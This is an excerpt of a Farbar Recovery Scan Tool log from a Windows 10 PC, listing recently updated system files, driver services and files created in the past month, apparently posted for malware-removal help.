2017-03-14 18:36 - 2017-03-04 07:08 - 00713216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wpnapps.dll
2017-03-14 18:36 - 2017-03-04 07:07 - 02748928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mispace.dll
2017-03-14 18:36 - 2017-03-04 07:07 - 02643456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tquery.dll
2017-03-14 18:36 - 2017-03-04 07:07 - 01255936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AzureSettingSyncProvider.dll
2017-03-14 18:36 - 2017-03-04 07:07 - 00895488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Streaming.dll
2017-03-14 18:36 - 2017-03-04 07:07 - 00545280 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmkvsrcsnk.dll
2017-03-14 18:36 - 2017-03-04 07:06 - 06109184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mos.dll
2017-03-14 18:36 - 2017-03-04 07:06 - 05380608 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\BingMaps.dll
2017-03-14 18:36 - 2017-03-04 07:06 - 03198464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cdp.dll
2017-03-14 18:36 - 2017-03-04 07:06 - 02153984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\storagewmi.dll
2017-03-14 18:36 - 2017-03-04 07:06 - 00220672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PlayToReceiver.dll
2017-03-14 18:36 - 2017-03-04 07:05 - 07468544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mstscax.dll
2017-03-14 18:36 - 2017-03-04 07:05 - 01221120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Audio.dll
2017-03-14 18:36 - 2017-03-04 07:05 - 00545792 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\uReFS.dll
2017-03-14 18:36 - 2017-03-04 07:05 - 00458752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wlidprov.dll
2017-03-14 18:36 - 2017-03-04 07:05 - 00298496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\resutils.dll
2017-03-14 18:36 - 2017-03-04 07:04 - 00753152 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\imapi2fs.dll
2017-03-14 18:36 - 2017-03-04 07:04 - 00719872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wsp_sr.dll
2017-03-14 18:36 - 2017-03-04 07:04 - 00640000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MCRecvSrc.dll
2017-03-14 18:36 - 2017-03-04 07:03 - 02363904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MapRouter.dll
2017-03-14 18:36 - 2017-03-04 07:03 - 02109952 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MapGeocoder.dll
2017-03-14 18:36 - 2017-03-04 07:03 - 01247232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Globalization.dll
2017-03-14 18:36 - 2017-03-04 07:03 - 00400384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PlayToManager.dll
2017-03-14 18:36 - 2017-03-04 07:03 - 00359936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mtxclu.dll
2017-03-14 18:36 - 2017-03-04 07:02 - 04423680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ExplorerFrame.dll
2017-03-14 18:36 - 2017-03-04 07:02 - 02740224 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msftedit.dll
2017-03-14 18:36 - 2017-03-04 07:02 - 02484736 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\gameux.dll
2017-03-14 18:36 - 2017-03-04 07:02 - 02138112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InputService.dll
2017-03-14 18:36 - 2017-03-04 07:02 - 01709056 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ActiveSyncProvider.dll
2017-03-14 18:36 - 2017-03-04 07:02 - 01170944 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Speech.dll
2017-03-14 18:36 - 2017-03-04 07:02 - 01004544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Input.Inking.dll
2017-03-14 18:36 - 2017-03-04 07:01 - 02682880 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\netshell.dll
2017-03-14 18:36 - 2017-03-04 07:01 - 02646528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CertEnroll.dll
2017-03-14 18:36 - 2017-03-04 07:01 - 01993216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dwmcore.dll
2017-03-14 18:36 - 2017-03-04 07:01 - 01988096 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mssrch.dll
2017-03-14 18:36 - 2017-03-04 07:01 - 01656320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Perception.dll
2017-03-14 18:36 - 2017-03-04 07:01 - 01595904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll
2017-03-14 18:36 - 2017-03-04 07:01 - 01571840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msxml3.dll
2017-03-14 18:36 - 2017-03-04 07:01 - 01564160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\quartz.dll
2017-03-14 18:36 - 2017-03-04 07:01 - 01556992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Immersive.dll
2017-03-14 18:36 - 2017-03-04 07:01 - 01293312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WMPDMC.exe
2017-03-14 18:36 - 2017-03-04 07:01 - 01232384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.Maps.dll
2017-03-14 18:36 - 2017-03-04 07:01 - 01154560 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Pimstore.dll
2017-03-14 18:36 - 2017-03-04 07:01 - 01013248 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Web.Http.dll
2017-03-14 18:36 - 2017-03-04 07:01 - 00827904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinui.appcore.dll
2017-03-14 18:36 - 2017-03-04 07:01 - 00773120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SearchIndexer.exe
2017-03-14 18:36 - 2017-03-04 07:01 - 00620544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.dll
2017-03-14 18:36 - 2017-03-04 07:01 - 00566784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ShareHost.dll
2017-03-14 18:36 - 2017-03-04 07:01 - 00560640 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserLanguagesCpl.dll
2017-03-14 18:36 - 2017-03-04 07:01 - 00422400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinapi.dll
2017-03-14 18:36 - 2017-03-04 07:00 - 04557824 _____ (Microsoft) C:\WINDOWS\SysWOW64\dbgeng.dll
2017-03-14 18:36 - 2017-03-04 07:00 - 02996736 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32kfull.sys
2017-03-14 18:36 - 2017-03-04 07:00 - 02483200 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll
2017-03-14 18:36 - 2017-03-04 07:00 - 02003968 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DWrite.dll
2017-03-14 18:36 - 2017-03-04 07:00 - 01883648 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Logon.dll
2017-03-14 18:36 - 2017-03-04 07:00 - 01170944 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.Phone.dll
2017-03-14 18:36 - 2017-03-04 07:00 - 00862208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SettingSyncCore.dll
2017-03-14 18:36 - 2017-03-04 07:00 - 00798208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\authui.dll
2017-03-14 18:36 - 2017-03-04 07:00 - 00751104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Networking.BackgroundTransfer.dll
2017-03-14 18:36 - 2017-03-04 07:00 - 00711680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Search.dll
2017-03-14 18:36 - 2017-03-04 07:00 - 00691200 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TokenBroker.dll
2017-03-14 18:36 - 2017-03-04 07:00 - 00654336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MbaeApiPublic.dll
2017-03-14 18:36 - 2017-03-04 07:00 - 00598528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Web.dll
2017-03-14 18:36 - 2017-03-04 07:00 - 00444416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SettingSync.dll
2017-03-14 18:36 - 2017-03-04 07:00 - 00348160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Midi.dll
2017-03-14 18:36 - 2017-03-04 06:59 - 00353280 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TextInputFramework.dll
2017-03-14 18:36 - 2017-03-04 06:59 - 00206848 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Core.TextInput.dll
2017-03-14 18:36 - 2017-03-04 06:57 - 03106304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mstsc.exe
2017-03-14 18:36 - 2017-03-04 06:57 - 00783360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TSWorkspace.dll
2017-03-14 18:36 - 2017-03-04 06:57 - 00449024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TpmCoreProvisioning.dll
2017-03-14 18:36 - 2017-03-04 06:57 - 00299008 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\RADCUI.dll
2017-03-14 18:35 - 2017-03-04 08:57 - 00192352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\aepic.dll
2017-03-14 18:35 - 2017-03-04 08:35 - 01617760 _____ (Microsoft Corporation) C:\WINDOWS\system32\appraiser.dll
2017-03-14 18:35 - 2017-03-04 08:35 - 01294688 _____ (Microsoft Corporation) C:\WINDOWS\system32\aeinv.dll
2017-03-14 18:35 - 2017-03-04 08:35 - 00655200 _____ (Microsoft Corporation) C:\WINDOWS\system32\generaltel.dll
2017-03-14 18:35 - 2017-03-04 08:35 - 00590952 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioSes.dll
2017-03-14 18:35 - 2017-03-04 08:35 - 00565088 _____ (Microsoft Corporation) C:\WINDOWS\system32\devinv.dll
2017-03-14 18:35 - 2017-03-04 08:35 - 00378720 _____ (Adobe Systems Incorporated) C:\WINDOWS\system32\atmfd.dll
2017-03-14 18:35 - 2017-03-04 08:35 - 00343904 _____ (Microsoft Corporation) C:\WINDOWS\system32\invagent.dll
2017-03-14 18:35 - 2017-03-04 08:35 - 00315232 _____ (Microsoft Corporation) C:\WINDOWS\system32\dcntel.dll
2017-03-14 18:35 - 2017-03-04 08:35 - 00242528 _____ (Microsoft Corporation) C:\WINDOWS\system32\aepic.dll
2017-03-14 18:35 - 2017-03-04 08:35 - 00142176 _____ (Microsoft Corporation) C:\WINDOWS\system32\acmigration.dll
2017-03-14 18:35 - 2017-03-04 08:35 - 00086368 _____ (Microsoft Corporation) C:\WINDOWS\system32\CompatTelRunner.exe
2017-03-14 18:35 - 2017-03-04 08:35 - 00038240 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceCensus.exe
2017-03-14 18:35 - 2017-03-04 08:27 - 00603488 _____ (Microsoft Corporation) C:\WINDOWS\system32\ContentDeliveryManager.Utilities.dll
2017-03-14 18:35 - 2017-03-04 08:26 - 00794416 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.Shell.Broker.dll
2017-03-14 18:35 - 2017-03-04 08:25 - 01117024 _____ (Microsoft Corporation) C:\WINDOWS\system32\ReAgent.dll
2017-03-14 18:35 - 2017-03-04 08:24 - 02482280 _____ (Microsoft Corporation) C:\WINDOWS\system32\msmpeg2vdec.dll
2017-03-14 18:35 - 2017-03-04 08:24 - 02186896 _____ (Microsoft Corporation) C:\WINDOWS\system32\hevcdecoder.dll
2017-03-14 18:35 - 2017-03-04 08:24 - 01051112 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.efi
2017-03-14 18:35 - 2017-03-04 08:24 - 00894096 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.exe
2017-03-14 18:35 - 2017-03-04 08:24 - 00646688 _____ (Microsoft Corporation) C:\WINDOWS\system32\dnsapi.dll
2017-03-14 18:35 - 2017-03-04 08:24 - 00354264 _____ (Microsoft Corporation) C:\WINDOWS\system32\systemreset.exe
2017-03-14 18:35 - 2017-03-04 08:24 - 00108384 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\pdc.sys
2017-03-14 18:35 - 2017-03-04 08:23 - 02512304 _____ (Microsoft Corporation) C:\WINDOWS\system32\WMVDECOD.DLL
2017-03-14 18:35 - 2017-03-04 08:22 - 07786336 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
2017-03-14 18:35 - 2017-03-04 08:22 - 02213760 _____ (Microsoft Corporation) C:\WINDOWS\system32\KernelBase.dll
2017-03-14 18:35 - 2017-03-04 08:22 - 01354312 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.efi
2017-03-14 18:35 - 2017-03-04 08:22 - 01172984 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.exe
2017-03-14 18:35 - 2017-03-04 08:21 - 02255712 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ntfs.sys
2017-03-14 18:35 - 2017-03-04 08:20 - 00379744 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\Classpnp.sys
2017-03-14 18:35 - 2017-03-04 08:20 - 00128352 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\partmgr.sys
2017-03-14 18:35 - 2017-03-04 08:19 - 02681200 _____ C:\WINDOWS\system32\CoreUIComponents.dll
2017-03-14 18:35 - 2017-03-04 08:19 - 02049480 _____ (Microsoft Corporation) C:\WINDOWS\system32\wmpmde.dll
2017-03-14 18:35 - 2017-03-04 08:18 - 01181024 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ndis.sys
2017-03-14 18:35 - 2017-03-04 08:18 - 00764392 _____ (Microsoft Corporation) C:\WINDOWS\system32\CoreMessaging.dll
2017-03-14 18:35 - 2017-03-04 08:18 - 00219040 _____ (Microsoft Corporation) C:\WINDOWS\system32\IPHLPAPI.DLL
2017-03-14 18:35 - 2017-03-04 08:18 - 00118624 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tdx.sys
2017-03-14 18:35 - 2017-03-04 08:17 - 00409952 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\FWPKCLNT.SYS
2017-03-14 18:35 - 2017-03-04 08:15 - 01000280 _____ (Microsoft Corporation) C:\WINDOWS\system32\SecConfig.efi
2017-03-14 18:35 - 2017-03-04 08:15 - 00404320 _____ (Microsoft Corporation) C:\WINDOWS\system32\WinSetupUI.dll
2017-03-14 18:35 - 2017-03-04 08:15 - 00063328 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dam.sys
2017-03-14 18:35 - 2017-03-04 08:13 - 00635456 _____ (Microsoft Corporation) C:\WINDOWS\system32\ci.dll
2017-03-14 18:35 - 2017-03-04 08:11 - 00328008 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Storage.ApplicationData.dll
2017-03-14 18:35 - 2017-03-04 08:11 - 00266544 _____ (Microsoft Corporation) C:\WINDOWS\system32\policymanager.dll
2017-03-14 18:35 - 2017-03-04 08:10 - 02828384 _____ (Microsoft Corporation) C:\WINDOWS\system32\d3d11.dll
2017-03-14 18:35 - 2017-03-04 08:10 - 02189664 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgkrnl.sys
2017-03-14 18:35 - 2017-03-04 08:10 - 00360040 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemSettingsAdminFlows.exe
2017-03-14 18:35 - 2017-03-04 08:09 - 07220696 _____ (Microsoft Corporation) C:\WINDOWS\system32\windows.storage.dll
2017-03-14 18:35 - 2017-03-04 08:09 - 02750384 _____ (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll
2017-03-14 18:35 - 2017-03-04 08:09 - 01860288 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.Store.dll
2017-03-14 18:35 - 2017-03-04 08:09 - 01293152 _____ (Microsoft Corporation) C:\WINDOWS\system32\LicenseManager.dll
2017-03-14 18:35 - 2017-03-04 08:09 - 01157000 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinapi.appcore.dll
2017-03-14 18:35 - 2017-03-04 08:09 - 00857440 _____ (Microsoft Corporation) C:\WINDOWS\system32\WWAHost.exe
2017-03-14 18:35 - 2017-03-04 08:09 - 00681312 _____ (Microsoft Corporation) C:\WINDOWS\system32\SHCore.dll
2017-03-14 18:35 - 2017-03-04 08:09 - 00658784 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms2.sys
2017-03-14 18:35 - 2017-03-04 08:09 - 00635864 _____ (Microsoft Corporation) C:\WINDOWS\system32\dxgi.dll
2017-03-14 18:35 - 2017-03-04 08:09 - 00578392 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingSyncHost.exe
2017-03-14 18:35 - 2017-03-04 08:09 - 00527808 _____ (Microsoft Corporation) C:\WINDOWS\system32\WWanAPI.dll
2017-03-14 18:35 - 2017-03-04 08:09 - 00402272 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms1.sys
2017-03-14 18:35 - 2017-03-04 08:09 - 00396168 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlanapi.dll
2017-03-14 18:35 - 2017-03-04 08:09 - 00178520 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudExperienceHostUser.dll
2017-03-14 18:35 - 2017-03-04 08:08 - 00624048 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\cng.sys
2017-03-14 18:35 - 2017-03-04 08:08 - 00509280 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\storport.sys
2017-03-14 18:35 - 2017-03-04 08:08 - 00450400 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb.sys
2017-03-14 18:35 - 2017-03-04 08:08 - 00342456 _____ (Microsoft Corporation) C:\WINDOWS\system32\wintrust.dll
2017-03-14 18:35 - 2017-03-04 08:08 - 00223584 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb20.sys
2017-03-14 18:35 - 2017-03-04 08:07 - 02913144 _____ (Microsoft Corporation) C:\WINDOWS\system32\combas
U1 Null; C:\Windows\System32\Drivers\Null.sys [7168 2016-07-16] (Microsoft Corporation) [File not signed]
U3 nvlddmkm; C:\WINDOWS\System32\DriverStore\FileRepository\nv_dispiwu.inf_amd64_b67dc924fff8de6d\nvlddmkm.sys [14199224 2017-01-04] (NVIDIA Corporation)
U3 NvStreamKms; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [27584 2017-02-23] (NVIDIA Corporation)
U3 nvvad_WaveExtensible; C:\WINDOWS\system32\drivers\nvvad64v.sys [46016 2017-01-20] (NVIDIA Corporation)
U3 nvvhci; C:\WINDOWS\System32\drivers\nvvhci.sys [57792 2017-02-23] (NVIDIA Corporation)
U3 Parport; C:\WINDOWS\System32\drivers\parport.sys [96768 2016-07-16] (Microsoft Corporation) [File not signed]
U2 PEAUTH; C:\WINDOWS\System32\drivers\peauth.sys [723968 2016-07-16] (Microsoft Corporation) [File not signed]
U3 PptpMiniport; C:\WINDOWS\System32\drivers\raspptp.sys [96256 2016-07-16] (Microsoft Corporation) [File not signed]
U3 Processor; C:\WINDOWS\System32\drivers\processr.sys [119808 2016-07-16] (Microsoft Corporation) [File not signed]
U3 QWAVEdrv; C:\WINDOWS\system32\drivers\qwavedrv.sys [48640 2016-07-16] (Microsoft Corporation) [File not signed]
U3 RasAcd; C:\WINDOWS\System32\DRIVERS\rasacd.sys [17408 2016-07-16] (Microsoft Corporation) [File not signed]
U3 RasAgileVpn; C:\WINDOWS\System32\drivers\AgileVpn.sys [107520 2016-07-16] (Microsoft Corporation) [File not signed]
U3 Rasl2tp; C:\WINDOWS\System32\drivers\rasl2tp.sys [104960 2016-07-16] (Microsoft Corporation) [File not signed]
U3 RasPppoe; C:\WINDOWS\System32\DRIVERS\raspppoe.sys [81408 2016-07-16] (Microsoft Corporation) [File not signed]
U3 RasSstp; C:\WINDOWS\System32\drivers\rassstp.sys [77824 2016-07-16] (Microsoft Corporation) [File not signed]
U1 RawDisk3; C:\Windows\system32\drivers\rawdsk3.sys [32568 2015-08-15] (EldoS Corporation)
U3 rdpbus; C:\WINDOWS\System32\drivers\rdpbus.sys [26112 2016-07-16] (Microsoft Corporation) [File not signed]
U3 RDPDR; C:\WINDOWS\System32\drivers\rdpdr.sys [177152 2016-07-16] (Microsoft Corporation) [File not signed]
U2 rspndr; C:\WINDOWS\System32\drivers\rspndr.sys [81408 2016-07-16] (Microsoft Corporation) [File not signed]
U3 rt640x64; C:\WINDOWS\System32\drivers\rt640x64.sys [886528 2015-05-29] (Realtek )
U3 s3cap; C:\WINDOWS\System32\drivers\vms3cap.sys [9216 2016-07-16] (Microsoft Corporation) [File not signed]
U3 scfilter; C:\WINDOWS\System32\DRIVERS\scfilter.sys [43008 2016-07-16] (Microsoft Corporation) [File not signed]
U3 scmdisk0101; C:\WINDOWS\System32\drivers\scmdisk0101.sys [123904 2016-07-16] (Microsoft Corporation) [File not signed]
U3 Serenum; C:\WINDOWS\System32\drivers\serenum.sys [25088 2016-07-16] (Microsoft Corporation) [File not signed]
U3 Serial; C:\WINDOWS\System32\drivers\serial.sys [83968 2016-07-16] (Microsoft Corporation) [File not signed]
U3 sermouse; C:\WINDOWS\System32\drivers\sermouse.sys [27648 2016-07-16] (Microsoft Corporation) [File not signed]
U3 sfloppy; C:\WINDOWS\System32\drivers\sfloppy.sys [18432 2016-07-16] (Microsoft Corporation) [File not signed]
U2 srv; C:\WINDOWS\System32\DRIVERS\srv.sys [410112 2017-03-04] (Microsoft Corporation) [File not signed]
U3 srv2; C:\WINDOWS\System32\DRIVERS\srv2.sys [713216 2016-11-11] (Microsoft Corporation) [File not signed]
U3 srvnet; C:\WINDOWS\System32\DRIVERS\srvnet.sys [248320 2016-09-27] (Microsoft Corporation) [File not signed]
U2 storqosflt; C:\WINDOWS\System32\drivers\storqosflt.sys [78336 2016-07-16] (Microsoft Corporation) [File not signed]
U3 Synth3dVsc; C:\WINDOWS\System32\drivers\Synth3dVsc.sys [64000 2016-07-16] (Microsoft Corporation) [File not signed]
U2 tcpipreg; C:\WINDOWS\System32\drivers\tcpipreg.sys [52224 2017-03-04] (Microsoft Corporation) [File not signed]
U3 tsusbflt; C:\WINDOWS\System32\drivers\TsUsbFlt.sys [61440 2016-07-16] (Microsoft Corporation) [File not signed]
U3 TsUsbGD; C:\WINDOWS\System32\drivers\TsUsbGD.sys [34304 2016-07-16] (Microsoft Corporation) [File not signed]
U3 tunnel; C:\WINDOWS\System32\drivers\tunnel.sys [158208 2016-07-16] (Microsoft Corporation) [File not signed]
U3 UcmCx0101; C:\WINDOWS\System32\Drivers\UcmCx.sys [95744 2016-07-16] (Microsoft Corporation) [File not signed]
U3 UcmTcpciCx0101; C:\WINDOWS\System32\Drivers\UcmTcpciCx.sys [108544 2016-07-16] (Microsoft Corporation) [File not signed]
U3 UcmUcsi; C:\WINDOWS\System32\drivers\UcmUcsi.sys [50688 2016-07-16] (Microsoft Corporation) [File not signed]
U3 UdeCx; C:\WINDOWS\System32\drivers\udecx.sys [45568 2016-07-16] (Microsoft Corporation) [File not signed]
U4 udfs; C:\WINDOWS\System32\DRIVERS\udfs.sys [320000 2016-07-16] (Microsoft Corporation) [File not signed]
U3 umbus; C:\WINDOWS\System32\drivers\umbus.sys [56832 2016-07-16] (Microsoft Corporation) [File not signed]
U3 UmPass; C:\WINDOWS\System32\drivers\umpass.sys [13824 2016-07-16] (Microsoft Corporation) [File not signed]
U3 usbaudio; C:\WINDOWS\system32\drivers\usbaudio.sys [132096 2016-07-16] (Microsoft Corporation) [File not signed]
U3 usbcir; C:\WINDOWS\System32\drivers\usbcir.sys [102400 2016-07-16] (Microsoft Corporation) [File not signed]
U3 usbohci; C:\WINDOWS\System32\drivers\usbohci.sys [30208 2016-07-16] (Microsoft Corporation) [File not signed]
U3 usbprint; C:\WINDOWS\System32\drivers\usbprint.sys [27648 2016-07-16] (Microsoft Corporation) [File not signed]
U3 usbser; C:\WINDOWS\System32\drivers\usbser.sys [69120 2016-07-16] (Microsoft Corporation) [File not signed]
U3 usbuhci; C:\WINDOWS\System32\drivers\usbuhci.sys [35328 2016-07-16] (Microsoft Corporation) [File not signed]
U3 usbvideo; C:\WINDOWS\System32\Drivers\usbvideo.sys [226816 2016-09-27] (Microsoft Corporation) [File not signed]
U3 vhf; C:\WINDOWS\System32\drivers\vhf.sys [32256 2016-07-16] (Microsoft Corporation) [File not signed]
U3 VMBusHID; C:\WINDOWS\System32\drivers\VMBusHID.sys [25088 2016-07-16] (Microsoft Corporation) [File not signed]
U3 vmgid; C:\WINDOWS\System32\drivers\vmgid.sys [10240 2016-07-16] (Microsoft Corporation) [File not signed]
U3 vwifibus; C:\WINDOWS\System32\drivers\vwifibus.sys [26624 2016-07-16] (Microsoft Corporation) [File not signed]
U1 vwififlt; C:\WINDOWS\System32\drivers\vwififlt.sys [73216 2016-07-16] (Microsoft Corporation) [File not signed]
U3 WacomPen; C:\WINDOWS\System32\drivers\wacompen.sys [30208 2016-07-16] (Microsoft Corporation) [File not signed]
U2 wanarp; C:\WINDOWS\System32\DRIVERS\wanarp.sys [79872 2016-07-16] (Microsoft Corporation) [File not signed]
U3 wanarpv6; C:\WINDOWS\System32\DRIVERS\wanarp.sys [79872 2016-07-16] (Microsoft Corporation) [File not signed]
U2 wcnfs; C:\WINDOWS\system32\drivers\wcnfs.sys [66560 2016-07-16] (Microsoft Corporation) [File not signed]
U3 WdBoot; C:\WINDOWS\system32\drivers\WdBoot.sys [44056 2016-07-16] (Microsoft Corporation)
U3 WdFilter; C:\WINDOWS\system32\drivers\WdFilter.sys [290144 2016-07-16] (Microsoft Corporation)
U3 wdiwifi; C:\WINDOWS\System32\DRIVERS\wdiwifi.sys [719872 2017-03-04] (Microsoft Corporation) [File not signed]
U3 wdm_usb; C:\WINDOWS\system32\DRIVERS\usb2ser.sys [159936 2016-08-16] (MBB)
U3 WdNisDrv; C:\WINDOWS\System32\Drivers\WdNisDrv.sys [123232 2016-07-16] (Microsoft Corporation)
U2 WIBUKEY; C:\WINDOWS\System32\DRIVERS\WibuKey64.sys [106760 2013-12-18] (WIBU-SYSTEMS AG)
U3 WINUSB; C:\WINDOWS\System32\drivers\WinUSB.SYS [89088 2016-07-16] (Microsoft Corporation) [File not signed]
U3 WmiAcpi; C:\WINDOWS\System32\drivers\wmiacpi.sys [18432 2016-07-16] (Microsoft Corporation) [File not signed]
U4 ws2ifsl; C:\WINDOWS\system32\drivers\ws2ifsl.sys [22528 2016-07-16] (Microsoft Corporation) [File not signed]
U3 WudfPf; C:\WINDOWS\System32\drivers\WudfPf.sys [99328 2016-07-16] (Microsoft Corporation) [File not signed]
U3 WUDFRd; C:\WINDOWS\System32\drivers\WudfRd.sys [216064 2016-07-16] (Microsoft Corporation) [File not signed]
U3 WUDFWpdFs; C:\WINDOWS\system32\DRIVERS\WUDFRd.sys [216064 2016-07-16] (Microsoft Corporation) [File not signed]
U3 WUDFWpdMtp; C:\WINDOWS\system32\DRIVERS\WUDFRd.sys [216064 2016-07-16] (Microsoft Corporation) [File not signed]
U3 xboxgip; C:\WINDOWS\System32\drivers\xboxgip.sys [258560 2017-03-04] (Microsoft Corporation) [File not signed]
U3 xinputhid; C:\WINDOWS\System32\drivers\xinputhid.sys [43520 2016-09-27] (Microsoft Corporation) [File not signed]
U3 xusb22; C:\WINDOWS\System32\drivers\xusb22.sys [95744 2016-07-16] (Microsoft Corporation) [File not signed]
U1 ZAM; C:\WINDOWS\System32\drivers\zam64.sys [203680 2017-03-16] (Zemana Ltd.)
U1 ZAM_Guard; C:\WINDOWS\System32\drivers\zamguard64.sys [203680 2017-03-16] (Zemana Ltd.)
U1 ekswxtuc; \??\C:\WINDOWS\system32\drivers\ekswxtuc.sys [X]
U1 xlkgrbft; \??\C:\WINDOWS\system32\drivers\xlkgrbft.sys [X]
==================== NetSvcs (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
==================== One Month Created files and folders ========
(If an entry is included in the fixlist, the file/folder will be moved.)
2017-03-16 16:40 - 2017-03-16 16:41 - 00042454 _____ C:\Users\Nekut\Desktop\Addition.txt
2017-03-16 16:38 - 2017-03-16 16:46 - 00062427 _____ C:\Users\Nekut\Desktop\FRST.txt
2017-03-16 16:34 - 2017-03-16 16:46 - 00000000 ____D C:\FRST
2017-03-16 16:34 - 2017-03-16 16:34 - 02424832 _____ (Farbar) C:\Users\Nekut\Desktop\FRST64.exe
2017-03-16 16:34 - 2017-03-16 16:34 - 00001956 _____ C:\WINDOWS\system32\Drivers\fvstore.dat
